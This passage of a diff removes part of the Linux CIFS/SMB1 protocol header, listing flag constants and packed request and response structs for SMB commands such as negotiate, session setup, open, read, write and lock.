+-#define CIFS_NO_HANDLE        0xFFFF
+-
+-#define NO_CHANGE_64          0xFFFFFFFFFFFFFFFFULL
+-
+-/* IPC$ in ASCII */
+-#define CIFS_IPC_RESOURCE "\x49\x50\x43\x24"
+-
+-/* IPC$ in Unicode */
+-#define CIFS_IPC_UNICODE_RESOURCE "\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00"
+-
+-/* Unicode Null terminate 2 bytes of 0 */
+-#define UNICODE_NULL "\x00\x00"
+-#define ASCII_NULL 0x00
+-
+-/*
+- * Server type values (returned on EnumServer API
+- */
+-#define CIFS_SV_TYPE_DC     0x00000008
+-#define CIFS_SV_TYPE_BACKDC 0x00000010
+-
+-/*
+- * Alias type flags (From EnumAlias API call
+- */
+-#define CIFS_ALIAS_TYPE_FILE 0x0001
+-#define CIFS_SHARE_TYPE_FILE 0x0000
+-
+-/*
+- * File Attribute flags
+- */
+-#define ATTR_READONLY  0x0001
+-#define ATTR_HIDDEN    0x0002
+-#define ATTR_SYSTEM    0x0004
+-#define ATTR_VOLUME    0x0008
+-#define ATTR_DIRECTORY 0x0010
+-#define ATTR_ARCHIVE   0x0020
+-#define ATTR_DEVICE    0x0040
+-#define ATTR_NORMAL    0x0080
+-#define ATTR_TEMPORARY 0x0100
+-#define ATTR_SPARSE    0x0200
+-#define ATTR_REPARSE   0x0400
+-#define ATTR_COMPRESSED 0x0800
+-#define ATTR_OFFLINE    0x1000	/* ie file not immediately available -
+-					on offline storage */
+-#define ATTR_NOT_CONTENT_INDEXED 0x2000
+-#define ATTR_ENCRYPTED  0x4000
+-#define ATTR_POSIX_SEMANTICS 0x01000000
+-#define ATTR_BACKUP_SEMANTICS 0x02000000
+-#define ATTR_DELETE_ON_CLOSE 0x04000000
+-#define ATTR_SEQUENTIAL_SCAN 0x08000000
+-#define ATTR_RANDOM_ACCESS   0x10000000
+-#define ATTR_NO_BUFFERING    0x20000000
+-#define ATTR_WRITE_THROUGH   0x80000000
+-
+-/* ShareAccess flags */
+-#define FILE_NO_SHARE     0x00000000
+-#define FILE_SHARE_READ   0x00000001
+-#define FILE_SHARE_WRITE  0x00000002
+-#define FILE_SHARE_DELETE 0x00000004
+-#define FILE_SHARE_ALL    0x00000007
+-
+-/* CreateDisposition flags, similar to CreateAction as well */
+-#define FILE_SUPERSEDE    0x00000000
+-#define FILE_OPEN         0x00000001
+-#define FILE_CREATE       0x00000002
+-#define FILE_OPEN_IF      0x00000003
+-#define FILE_OVERWRITE    0x00000004
+-#define FILE_OVERWRITE_IF 0x00000005
+-
+-/* CreateOptions */
+-#define CREATE_NOT_FILE		0x00000001	/* if set must not be file */
+-#define CREATE_WRITE_THROUGH	0x00000002
+-#define CREATE_SEQUENTIAL       0x00000004
+-#define CREATE_NO_BUFFER        0x00000008      /* should not buffer on srv */
+-#define CREATE_SYNC_ALERT       0x00000010	/* MBZ */
+-#define CREATE_ASYNC_ALERT      0x00000020	/* MBZ */
+-#define CREATE_NOT_DIR		0x00000040    /* if set must not be directory */
+-#define CREATE_TREE_CONNECTION  0x00000080	/* should be zero */
+-#define CREATE_COMPLETE_IF_OPLK 0x00000100	/* should be zero */
+-#define CREATE_NO_EA_KNOWLEDGE  0x00000200
+-#define CREATE_EIGHT_DOT_THREE  0x00000400	/* doc says this is obsolete
+-						 "open for recovery" flag should
+-						 be zero in any case */
+-#define CREATE_OPEN_FOR_RECOVERY 0x00000400
+-#define CREATE_RANDOM_ACCESS	0x00000800
+-#define CREATE_DELETE_ON_CLOSE	0x00001000
+-#define CREATE_OPEN_BY_ID       0x00002000
+-#define CREATE_OPEN_BACKUP_INTENT 0x00004000
+-#define CREATE_NO_COMPRESSION   0x00008000
+-#define CREATE_RESERVE_OPFILTER 0x00100000	/* should be zero */
+-#define OPEN_REPARSE_POINT	0x00200000
+-#define OPEN_NO_RECALL          0x00400000
+-#define OPEN_FREE_SPACE_QUERY   0x00800000	/* should be zero */
+-#define CREATE_OPTIONS_MASK     0x007FFFFF
+-#define CREATE_OPTION_READONLY	0x10000000
+-#define CREATE_OPTION_SPECIAL   0x20000000   /* system. NB not sent over wire */
+-
+-/* ImpersonationLevel flags */
+-#define SECURITY_ANONYMOUS      0
+-#define SECURITY_IDENTIFICATION 1
+-#define SECURITY_IMPERSONATION  2
+-#define SECURITY_DELEGATION     3
+-
+-/* SecurityFlags */
+-#define SECURITY_CONTEXT_TRACKING 0x01
+-#define SECURITY_EFFECTIVE_ONLY   0x02
+-
+-/*
+- * Default PID value, used in all SMBs where the PID is not important
+- */
+-#define CIFS_DFT_PID  0x1234
+-
+-/*
+- * We use the same routine for Copy and Move SMBs.  This flag is used to
+- * distinguish
+- */
+-#define CIFS_COPY_OP 1
+-#define CIFS_RENAME_OP 2
+-
+-#define GETU16(var)  (*((__u16 *)var))	/* BB check for endian issues */
+-#define GETU32(var)  (*((__u32 *)var))	/* BB check for endian issues */
+-
+-struct smb_hdr {
+-	__be32 smb_buf_length;	/* BB length is only two (rarely three) bytes,
+-		with one or two byte "type" preceding it that will be
+-		zero - we could mask the type byte off */
+-	__u8 Protocol[4];
+-	__u8 Command;
+-	union {
+-		struct {
+-			__u8 ErrorClass;
+-			__u8 Reserved;
+-			__le16 Error;
+-		} __attribute__((packed)) DosError;
+-		__le32 CifsError;
+-	} __attribute__((packed)) Status;
+-	__u8 Flags;
+-	__le16 Flags2;		/* note: le */
+-	__le16 PidHigh;
+-	union {
+-		struct {
+-			__le32 SequenceNumber;  /* le */
+-			__u32 Reserved; /* zero */
+-		} __attribute__((packed)) Sequence;
+-		__u8 SecuritySignature[8];	/* le */
+-	} __attribute__((packed)) Signature;
+-	__u8 pad[2];
+-	__u16 Tid;
+-	__le16 Pid;
+-	__u16 Uid;
+-	__le16 Mid;
+-	__u8 WordCount;
+-} __attribute__((packed));
+-
+-/* given a pointer to an smb_hdr, retrieve a void pointer to the ByteCount */
+-static inline void *
+-BCC(struct smb_hdr *smb)
+-{
+-	return (void *)smb + sizeof(*smb) + 2 * smb->WordCount;
+-}
+-
+-/* given a pointer to an smb_hdr retrieve the pointer to the byte area */
+-#define pByteArea(smb_var) (BCC(smb_var) + 2)
+-
+-/* get the unconverted ByteCount for a SMB packet and return it */
+-static inline __u16
+-get_bcc(struct smb_hdr *hdr)
+-{
+-	__le16 *bc_ptr = (__le16 *)BCC(hdr);
+-
+-	return get_unaligned_le16(bc_ptr);
+-}
+-
+-/* set the ByteCount for a SMB packet in little-endian */
+-static inline void
+-put_bcc(__u16 count, struct smb_hdr *hdr)
+-{
+-	__le16 *bc_ptr = (__le16 *)BCC(hdr);
+-
+-	put_unaligned_le16(count, bc_ptr);
+-}
+-
+-/*
+- * Computer Name Length (since Netbios name was length 16 with last byte 0x20)
+- * No longer as important, now that TCP names are more commonly used to
+- * resolve hosts.
+- */
+-#define CNLEN 15
+-
+-/*
+- * Share Name Length (SNLEN)
+- * Note:  This length was limited by the SMB used to get
+- *        the Share info.   NetShareEnum only returned 13
+- *        chars, including the null termination.
+- * This was removed because it no longer is limiting.
+- */
+-
+-/*
+- * Comment Length
+- */
+-#define MAXCOMMENTLEN 40
+-
+-/*
+- * The OS/2 maximum path name
+- */
+-#define MAX_PATHCONF 256
+-
+-/*
+- *  SMB frame definitions  (following must be packed structs)
+- *  See the SNIA CIFS Specification for details.
+- *
+- *  The Naming convention is the lower case version of the
+- *  smb command code name for the struct and this is typedef to the
+- *  uppercase version of the same name with the prefix SMB_ removed
+- *  for brevity.  Although typedefs are not commonly used for
+- *  structure definitions in the Linux kernel, their use in the
+- *  CIFS standards document, which this code is based on, may
+- *  make this one of the cases where typedefs for structures make
+- *  sense to improve readability for readers of the standards doc.
+- *  Typedefs can always be removed later if they are too distracting
+- *  and they are only used for the CIFSs PDUs themselves, not
+- *  internal cifs vfs structures
+- *
+- */
+-
+-typedef struct negotiate_req {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__le16 ByteCount;
+-	unsigned char DialectsArray[];
+-} __attribute__((packed)) NEGOTIATE_REQ;
+-
+-#define MIN_TZ_ADJ (15 * 60) /* minimum grid for timezones in seconds */
+-
+-#define READ_RAW_ENABLE 1
+-#define WRITE_RAW_ENABLE 2
+-#define RAW_ENABLE (READ_RAW_ENABLE | WRITE_RAW_ENABLE)
+-#define SMB1_CLIENT_GUID_SIZE (16)
+-typedef struct negotiate_rsp {
+-	struct smb_hdr hdr;	/* wct = 17 */
+-	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__u8 SecurityMode;
+-	__le16 MaxMpxCount;
+-	__le16 MaxNumberVcs;
+-	__le32 MaxBufferSize;
+-	__le32 MaxRawSize;
+-	__le32 SessionKey;
+-	__le32 Capabilities;	/* see below */
+-	__le32 SystemTimeLow;
+-	__le32 SystemTimeHigh;
+-	__le16 ServerTimeZone;
+-	__u8 EncryptionKeyLength;
+-	__u16 ByteCount;
+-	union {
+-		/* cap extended security off */
+-		DECLARE_FLEX_ARRAY(unsigned char, EncryptionKey);
+-		/* followed by Domain name - if extended security is off */
+-		/* followed by 16 bytes of server GUID */
+-		/* then security blob if cap_extended_security negotiated */
+-		struct {
+-			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
+-			unsigned char SecurityBlob[];
+-		} __attribute__((packed)) extended_response;
+-	} __attribute__((packed)) u;
+-} __attribute__((packed)) NEGOTIATE_RSP;
+-
+-/* SecurityMode bits */
+-#define SECMODE_USER          0x01	/* off indicates share level security */
+-#define SECMODE_PW_ENCRYPT    0x02
+-#define SECMODE_SIGN_ENABLED  0x04	/* SMB security signatures enabled */
+-#define SECMODE_SIGN_REQUIRED 0x08	/* SMB security signatures required */
+-
+-/* Negotiate response Capabilities */
+-#define CAP_RAW_MODE           0x00000001
+-#define CAP_MPX_MODE           0x00000002
+-#define CAP_UNICODE            0x00000004
+-#define CAP_LARGE_FILES        0x00000008
+-#define CAP_NT_SMBS            0x00000010	/* implies CAP_NT_FIND */
+-#define CAP_RPC_REMOTE_APIS    0x00000020
+-#define CAP_STATUS32           0x00000040
+-#define CAP_LEVEL_II_OPLOCKS   0x00000080
+-#define CAP_LOCK_AND_READ      0x00000100
+-#define CAP_NT_FIND            0x00000200
+-#define CAP_DFS                0x00001000
+-#define CAP_INFOLEVEL_PASSTHRU 0x00002000
+-#define CAP_LARGE_READ_X       0x00004000
+-#define CAP_LARGE_WRITE_X      0x00008000
+-#define CAP_LWIO               0x00010000 /* support fctl_srv_req_resume_key */
+-#define CAP_UNIX               0x00800000
+-#define CAP_COMPRESSED_DATA    0x02000000
+-#define CAP_DYNAMIC_REAUTH     0x20000000
+-#define CAP_PERSISTENT_HANDLES 0x40000000
+-#define CAP_EXTENDED_SECURITY  0x80000000
+-
+-typedef union smb_com_session_setup_andx {
+-	struct {		/* request format */
+-		struct smb_hdr hdr;	/* wct = 12 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 MaxBufferSize;
+-		__le16 MaxMpxCount;
+-		__le16 VcNumber;
+-		__u32 SessionKey;
+-		__le16 SecurityBlobLength;
+-		__u32 Reserved;
+-		__le32 Capabilities;	/* see below */
+-		__le16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
+-		/* STRING NativeOS */
+-		/* STRING NativeLanMan */
+-	} __attribute__((packed)) req;	/* NTLM request format (with
+-					extended security */
+-
+-	struct {		/* request format */
+-		struct smb_hdr hdr;	/* wct = 13 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 MaxBufferSize;
+-		__le16 MaxMpxCount;
+-		__le16 VcNumber;
+-		__u32 SessionKey;
+-		__le16 CaseInsensitivePasswordLength; /* ASCII password len */
+-		__le16 CaseSensitivePasswordLength; /* Unicode password length*/
+-		__u32 Reserved;	/* see below */
+-		__le32 Capabilities;
+-		__le16 ByteCount;
+-		unsigned char CaseInsensitivePassword[1];     /* followed by: */
+-		/* unsigned char * CaseSensitivePassword; */
+-		/* STRING AccountName */
+-		/* STRING PrimaryDomain */
+-		/* STRING NativeOS */
+-		/* STRING NativeLanMan */
+-	} __attribute__((packed)) req_no_secext; /* NTLM request format (without
+-							extended security */
+-
+-	struct {		/* default (NTLM) response format */
+-		struct smb_hdr hdr;	/* wct = 4 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 Action;	/* see below */
+-		__le16 SecurityBlobLength;
+-		__u16 ByteCount;
+-		unsigned char SecurityBlob[1];	/* followed by */
+-/*      unsigned char  * NativeOS;      */
+-/*	unsigned char  * NativeLanMan;  */
+-/*      unsigned char  * PrimaryDomain; */
+-	} __attribute__((packed)) resp;	/* NTLM response
+-					   (with or without extended sec) */
+-
+-	struct {		/* request format */
+-		struct smb_hdr hdr;	/* wct = 10 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 MaxBufferSize;
+-		__le16 MaxMpxCount;
+-		__le16 VcNumber;
+-		__u32 SessionKey;
+-		__le16 PasswordLength;
+-		__u32 Reserved; /* encrypt key len and offset */
+-		__le16 ByteCount;
+-		unsigned char AccountPassword[1];	/* followed by */
+-		/* STRING AccountName */
+-		/* STRING PrimaryDomain */
+-		/* STRING NativeOS */
+-		/* STRING NativeLanMan */
+-	} __attribute__((packed)) old_req; /* pre-NTLM (LANMAN2.1) req format */
+-
+-	struct {		/* default (NTLM) response format */
+-		struct smb_hdr hdr;	/* wct = 3 */
+-		__u8 AndXCommand;
+-		__u8 AndXReserved;
+-		__le16 AndXOffset;
+-		__le16 Action;	/* see below */
+-		__u16 ByteCount;
+-		unsigned char NativeOS[1];	/* followed by */
+-/*	unsigned char * NativeLanMan; */
+-/*      unsigned char * PrimaryDomain; */
+-	} __attribute__((packed)) old_resp; /* pre-NTLM (LANMAN2.1) response */
+-} __attribute__((packed)) SESSION_SETUP_ANDX;
+-
+-/* format of NLTMv2 Response ie "case sensitive password" hash when NTLMv2 */
+-
+-#define NTLMSSP_SERVER_TYPE	1
+-#define NTLMSSP_DOMAIN_TYPE	2
+-#define NTLMSSP_FQ_DOMAIN_TYPE	3
+-#define NTLMSSP_DNS_DOMAIN_TYPE	4
+-#define NTLMSSP_DNS_PARENT_TYPE	5
+-
+-struct ntlmssp2_name {
+-	__le16 type;
+-	__le16 length;
+-/*	char   name[length]; */
+-} __attribute__((packed));
+-
+-struct ntlmv2_resp {
+-	union {
+-	    char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+-	    struct {
+-		__u8 reserved[8];
+-		__u8 key[CIFS_SERVER_CHALLENGE_SIZE];
+-	    } __attribute__((packed)) challenge;
+-	} __attribute__((packed));
+-	__le32 blob_signature;
+-	__u32  reserved;
+-	__le64  time;
+-	__u64  client_chal; /* random */
+-	__u32  reserved2;
+-	/* array of name entries could follow ending in minimum 4 byte struct */
+-} __attribute__((packed));
+-
+-
+-#define CIFS_NETWORK_OPSYS "CIFS VFS Client for Linux"
+-
+-/* Capabilities bits (for NTLM SessSetup request) */
+-#define CAP_UNICODE            0x00000004
+-#define CAP_LARGE_FILES        0x00000008
+-#define CAP_NT_SMBS            0x00000010
+-#define CAP_STATUS32           0x00000040
+-#define CAP_LEVEL_II_OPLOCKS   0x00000080
+-#define CAP_NT_FIND            0x00000200	/* reserved should be zero
+-				(because NT_SMBs implies the same thing?) */
+-#define CAP_BULK_TRANSFER      0x20000000
+-#define CAP_EXTENDED_SECURITY  0x80000000
+-
+-/* Action bits */
+-#define GUEST_LOGIN 1
+-
+-typedef struct smb_com_tconx_req {
+-	struct smb_hdr hdr;	/* wct = 4 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 Flags;		/* see below */
+-	__le16 PasswordLength;
+-	__le16 ByteCount;
+-	unsigned char Password[1];	/* followed by */
+-/* STRING Path    *//* \\server\share name */
+-	/* STRING Service */
+-} __attribute__((packed)) TCONX_REQ;
+-
+-typedef struct smb_com_tconx_rsp {
+-	struct smb_hdr hdr;	/* wct = 3 , not extended response */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 OptionalSupport;	/* see below */
+-	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
+-	/* STRING NativeFileSystem */
+-} __attribute__((packed)) TCONX_RSP;
+-
+-typedef struct smb_com_tconx_rsp_ext {
+-	struct smb_hdr hdr;	/* wct = 7, extended response */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 OptionalSupport;	/* see below */
+-	__le32 MaximalShareAccessRights;
+-	__le32 GuestMaximalShareAccessRights;
+-	__u16 ByteCount;
+-	unsigned char Service[1];	/* always ASCII, not Unicode */
+-	/* STRING NativeFileSystem */
+-} __attribute__((packed)) TCONX_RSP_EXT;
+-
+-
+-/* tree connect Flags */
+-#define DISCONNECT_TID          0x0001
+-#define TCON_EXTENDED_SIGNATURES 0x0004
+-#define TCON_EXTENDED_SECINFO   0x0008
+-
+-/* OptionalSupport bits */
+-#define SMB_SUPPORT_SEARCH_BITS 0x0001	/* "must have" directory search bits
+-					 (exclusive searches supported) */
+-#define SMB_SHARE_IS_IN_DFS     0x0002
+-#define SMB_CSC_MASK               0x000C
+-/* CSC flags defined as follows */
+-#define SMB_CSC_CACHE_MANUAL_REINT 0x0000
+-#define SMB_CSC_CACHE_AUTO_REINT   0x0004
+-#define SMB_CSC_CACHE_VDO          0x0008
+-#define SMB_CSC_NO_CACHING         0x000C
+-#define SMB_UNIQUE_FILE_NAME    0x0010
+-#define SMB_EXTENDED_SIGNATURES 0x0020
+-
+-/* services
+- *
+- * A:       ie disk
+- * LPT1:    ie printer
+- * IPC      ie named pipe
+- * COMM
+- * ?????    ie any type
+- *
+- */
+-
+-typedef struct smb_com_echo_req {
+-	struct	smb_hdr hdr;
+-	__le16	EchoCount;
+-	__le16	ByteCount;
+-	char	Data[1];
+-} __attribute__((packed)) ECHO_REQ;
+-
+-typedef struct smb_com_echo_rsp {
+-	struct	smb_hdr hdr;
+-	__le16	SequenceNumber;
+-	__le16	ByteCount;
+-	char	Data[1];
+-} __attribute__((packed)) ECHO_RSP;
+-
+-typedef struct smb_com_logoff_andx_req {
+-	struct smb_hdr hdr;	/* wct = 2 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__u16 AndXOffset;
+-	__u16 ByteCount;
+-} __attribute__((packed)) LOGOFF_ANDX_REQ;
+-
+-typedef struct smb_com_logoff_andx_rsp {
+-	struct smb_hdr hdr;	/* wct = 2 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__u16 AndXOffset;
+-	__u16 ByteCount;
+-} __attribute__((packed)) LOGOFF_ANDX_RSP;
+-
+-typedef union smb_com_tree_disconnect {	/* as an altetnative can use flag on
+-					tree_connect PDU to effect disconnect */
+-					/* tdis is probably simplest SMB PDU */
+-	struct {
+-		struct smb_hdr hdr;	/* wct = 0 */
+-		__u16 ByteCount;	/* bcc = 0 */
+-	} __attribute__((packed)) req;
+-	struct {
+-		struct smb_hdr hdr;	/* wct = 0 */
+-		__u16 ByteCount;	/* bcc = 0 */
+-	} __attribute__((packed)) resp;
+-} __attribute__((packed)) TREE_DISCONNECT;
+-
+-typedef struct smb_com_close_req {
+-	struct smb_hdr hdr;	/* wct = 3 */
+-	__u16 FileID;
+-	__u32 LastWriteTime;	/* should be zero or -1 */
+-	__u16 ByteCount;	/* 0 */
+-} __attribute__((packed)) CLOSE_REQ;
+-
+-typedef struct smb_com_close_rsp {
+-	struct smb_hdr hdr;	/* wct = 0 */
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) CLOSE_RSP;
+-
+-typedef struct smb_com_flush_req {
+-	struct smb_hdr hdr;	/* wct = 1 */
+-	__u16 FileID;
+-	__u16 ByteCount;	/* 0 */
+-} __attribute__((packed)) FLUSH_REQ;
+-
+-typedef struct smb_com_findclose_req {
+-	struct smb_hdr hdr; /* wct = 1 */
+-	__u16 FileID;
+-	__u16 ByteCount;    /* 0 */
+-} __attribute__((packed)) FINDCLOSE_REQ;
+-
+-/* OpenFlags */
+-#define REQ_MORE_INFO      0x00000001  /* legacy (OPEN_AND_X) only */
+-#define REQ_OPLOCK         0x00000002
+-#define REQ_BATCHOPLOCK    0x00000004
+-#define REQ_OPENDIRONLY    0x00000008
+-#define REQ_EXTENDED_INFO  0x00000010
+-
+-/* File type */
+-#define DISK_TYPE		0x0000
+-#define BYTE_PIPE_TYPE		0x0001
+-#define MESSAGE_PIPE_TYPE	0x0002
+-#define PRINTER_TYPE		0x0003
+-#define COMM_DEV_TYPE		0x0004
+-#define UNKNOWN_TYPE		0xFFFF
+-
+-/* Device Type or File Status Flags */
+-#define NO_EAS			0x0001
+-#define NO_SUBSTREAMS		0x0002
+-#define NO_REPARSETAG		0x0004
+-/* following flags can apply if pipe */
+-#define ICOUNT_MASK		0x00FF
+-#define PIPE_READ_MODE		0x0100
+-#define NAMED_PIPE_TYPE		0x0400
+-#define PIPE_END_POINT		0x4000
+-#define BLOCKING_NAMED_PIPE	0x8000
+-
+-typedef struct smb_com_open_req {	/* also handles create */
+-	struct smb_hdr hdr;	/* wct = 24 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u8 Reserved;		/* Must Be Zero */
+-	__le16 NameLength;
+-	__le32 OpenFlags;
+-	__u32  RootDirectoryFid;
+-	__le32 DesiredAccess;
+-	__le64 AllocationSize;
+-	__le32 FileAttributes;
+-	__le32 ShareAccess;
+-	__le32 CreateDisposition;
+-	__le32 CreateOptions;
+-	__le32 ImpersonationLevel;
+-	__u8 SecurityFlags;
+-	__le16 ByteCount;
+-	char fileName[1];
+-} __attribute__((packed)) OPEN_REQ;
+-
+-/* open response: oplock levels */
+-#define OPLOCK_NONE  	 0
+-#define OPLOCK_EXCLUSIVE 1
+-#define OPLOCK_BATCH	 2
+-#define OPLOCK_READ	 3  /* level 2 oplock */
+-
+-/* open response for CreateAction shifted left */
+-#define CIFS_CREATE_ACTION 0x20000 /* file created */
+-
+-typedef struct smb_com_open_rsp {
+-	struct smb_hdr hdr;	/* wct = 34 BB */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u8 OplockLevel;
+-	__u16 Fid;
+-	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 FileAttributes;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le16 FileType;
+-	__le16 DeviceState;
+-	__u8 DirectoryFlag;
+-	__u16 ByteCount;	/* bct = 0 */
+-} __attribute__((packed)) OPEN_RSP;
+-
+-typedef struct smb_com_open_rsp_ext {
+-	struct smb_hdr hdr;     /* wct = 42 but meaningless due to MS bug? */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u8 OplockLevel;
+-	__u16 Fid;
+-	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 FileAttributes;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le16 FileType;
+-	__le16 DeviceState;
+-	__u8 DirectoryFlag;
+-	__u8 VolumeGUID[16];
+-	__u64 FileId; /* note no endian conversion - is opaque UniqueID */
+-	__le32 MaximalAccessRights;
+-	__le32 GuestMaximalAccessRights;
+-	__u16 ByteCount;        /* bct = 0 */
+-} __attribute__((packed)) OPEN_RSP_EXT;
+-
+-
+-/* format of legacy open request */
+-typedef struct smb_com_openx_req {
+-	struct smb_hdr	hdr;	/* wct = 15 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 OpenFlags;
+-	__le16 Mode;
+-	__le16 Sattr; /* search attributes */
+-	__le16 FileAttributes;  /* dos attrs */
+-	__le32 CreateTime; /* os2 format */
+-	__le16 OpenFunction;
+-	__le32 EndOfFile;
+-	__le32 Timeout;
+-	__le32 Reserved;
+-	__le16  ByteCount;  /* file name follows */
+-	char   fileName[1];
+-} __attribute__((packed)) OPENX_REQ;
+-
+-typedef struct smb_com_openx_rsp {
+-	struct smb_hdr	hdr;	/* wct = 15 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16  Fid;
+-	__le16 FileAttributes;
+-	__le32 LastWriteTime; /* os2 format */
+-	__le32 EndOfFile;
+-	__le16 Access;
+-	__le16 FileType;
+-	__le16 IPCState;
+-	__le16 Action;
+-	__u32  FileId;
+-	__u16  Reserved;
+-	__u16  ByteCount;
+-} __attribute__((packed)) OPENX_RSP;
+-
+-/* For encoding of POSIX Open Request - see trans2 function 0x209 data struct */
+-
+-/* Legacy write request for older servers */
+-typedef struct smb_com_writex_req {
+-	struct smb_hdr hdr;     /* wct = 12 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__u32 Reserved; /* Timeout */
+-	__le16 WriteMode; /* 1 = write through */
+-	__le16 Remaining;
+-	__le16 Reserved2;
+-	__le16 DataLengthLow;
+-	__le16 DataOffset;
+-	__le16 ByteCount;
+-	__u8 Pad;		/* BB check for whether padded to DWORD
+-				   boundary and optimum performance here */
+-	char Data[];
+-} __attribute__((packed)) WRITEX_REQ;
+-
+-typedef struct smb_com_write_req {
+-	struct smb_hdr hdr;	/* wct = 14 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__u32 Reserved;
+-	__le16 WriteMode;
+-	__le16 Remaining;
+-	__le16 DataLengthHigh;
+-	__le16 DataLengthLow;
+-	__le16 DataOffset;
+-	__le32 OffsetHigh;
+-	__le16 ByteCount;
+-	__u8 Pad;		/* BB check for whether padded to DWORD
+-				   boundary and optimum performance here */
+-	char Data[];
+-} __attribute__((packed)) WRITE_REQ;
+-
+-typedef struct smb_com_write_rsp {
+-	struct smb_hdr hdr;	/* wct = 6 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 Count;
+-	__le16 Remaining;
+-	__le16 CountHigh;
+-	__u16  Reserved;
+-	__u16 ByteCount;
+-} __attribute__((packed)) WRITE_RSP;
+-
+-/* legacy read request for older servers */
+-typedef struct smb_com_readx_req {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__le16 MaxCount;
+-	__le16 MinCount;	/* obsolete */
+-	__le32 Reserved;
+-	__le16 Remaining;
+-	__le16 ByteCount;
+-} __attribute__((packed)) READX_REQ;
+-
+-typedef struct smb_com_read_req {
+-	struct smb_hdr hdr;	/* wct = 12 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__le32 OffsetLow;
+-	__le16 MaxCount;
+-	__le16 MinCount;		/* obsolete */
+-	__le32 MaxCountHigh;
+-	__le16 Remaining;
+-	__le32 OffsetHigh;
+-	__le16 ByteCount;
+-} __attribute__((packed)) READ_REQ;
+-
+-typedef struct smb_com_read_rsp {
+-	struct smb_hdr hdr;	/* wct = 12 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__le16 Remaining;
+-	__le16 DataCompactionMode;
+-	__le16 Reserved;
+-	__le16 DataLength;
+-	__le16 DataOffset;
+-	__le16 DataLengthHigh;
+-	__u64 Reserved2;
+-	__u16 ByteCount;
+-	/* read response data immediately follows */
+-} __attribute__((packed)) READ_RSP;
+-
+-typedef struct locking_andx_range {
+-	__le16 Pid;
+-	__le16 Pad;
+-	__le32 OffsetHigh;
+-	__le32 OffsetLow;
+-	__le32 LengthHigh;
+-	__le32 LengthLow;
+-} __attribute__((packed)) LOCKING_ANDX_RANGE;
+-
+-#define LOCKING_ANDX_SHARED_LOCK     0x01
+-#define LOCKING_ANDX_OPLOCK_RELEASE  0x02
+-#define LOCKING_ANDX_CHANGE_LOCKTYPE 0x04
+-#define LOCKING_ANDX_CANCEL_LOCK     0x08
+-#define LOCKING_ANDX_LARGE_FILES     0x10	/* always on for us */
+-
+-typedef struct smb_com_lock_req {
+-	struct smb_hdr hdr;	/* wct = 8 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 Fid;
+-	__u8 LockType;
+-	__u8 OplockLevel;
+-	__le32 Timeout;
+-	__le16 NumberOfUnlocks;
+-	__le16 NumberOfLocks;
+-	__le16 ByteCount;
+-	LOCKING_ANDX_RANGE Locks[1];
+-} __attribute__((packed)) LOCK_REQ;
+-
+-/* lock type */
+-#define CIFS_RDLCK	0
+-#define CIFS_WRLCK	1
+-#define CIFS_UNLCK      2
+-typedef struct cifs_posix_lock {
+-	__le16  lock_type;  /* 0 = Read, 1 = Write, 2 = Unlock */
+-	__le16  lock_flags; /* 1 = Wait (only valid for setlock) */
+-	__le32  pid;
+-	__le64	start;
+-	__le64	length;
+-	/* BB what about additional owner info to identify network client */
+-} __attribute__((packed)) CIFS_POSIX_LOCK;
+-
+-typedef struct smb_com_lock_rsp {
+-	struct smb_hdr hdr;	/* wct = 2 */
+-	__u8 AndXCommand;
+-	__u8 AndXReserved;
+-	__le16 AndXOffset;
+-	__u16 ByteCount;
